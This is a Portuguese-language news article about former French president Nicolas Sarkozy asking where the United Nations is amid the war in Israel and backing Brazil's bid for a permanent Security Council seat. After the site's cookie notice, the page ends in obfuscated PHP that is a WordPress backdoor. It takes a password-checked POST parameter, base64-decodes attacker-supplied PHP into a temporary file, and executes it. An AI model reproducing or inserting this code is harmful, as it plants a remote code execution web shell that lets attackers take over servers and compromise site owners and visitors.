• 07.11.2023
  • Redação

“Onde estão as Nações Unidas?”, questiona ex-presidente da França em meio à guerra em Israel

Sarkozy pediu que Brasil e França assumam a liderança no processo de “desenhar aquilo que deveria ser um sistema multilateral do século 21 que possibilite falar e resolver as questões mundiais”

O ex-presidente francês, Nicolas Sarkozy (2007-2012), questionou no Fórum Esfera Paris, nesta sexta-feira (13), a relevância atual dos mecanismos das Nações Unidas (ONU). Fala ocorre em meio a guerra no Oriente Médio.

“Onde estão as Nações Unidas? Ela desapareceu. Quem dá importância ao que diz hoje o secretário das Nações Unidas? Tem alguém nesta sala? Todas as instituições, temos que reconstruir o sistema multilateral para falar, para abordar assuntos”, disse.

Sarkozy pediu que Brasil e França assumam a liderança no processo de “desenhar aquilo que deveria ser um sistema multilateral do século 21 que possibilite falar e resolver as questões mundiais”.

A reforma dos mecanismos multilaterais é um pleito do governo brasileiro, de Lula. A gestão federal também pede a entrada do Brasil no Conselho de Segurança da ONU — e recebeu apoio de Sarkozy nesta questão.

“Quando o Conselho de Segurança e os membros permanentes foram escolhidos o mundo tinha 2,5 bilhões de habitantes. Hoje temos 7,5 bilhões. Vocês acham que com 7,5 bilhões temos o mesmo número de países permanentes?”, disse.

“Não tem um país africano, um país da América do Sul. É uma loucura. Evidentemente, o Brasil tem vocação a ser membro do Conselho de Segurança, sempre defendi esta ideia, sempre pensei isto”, completou.

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}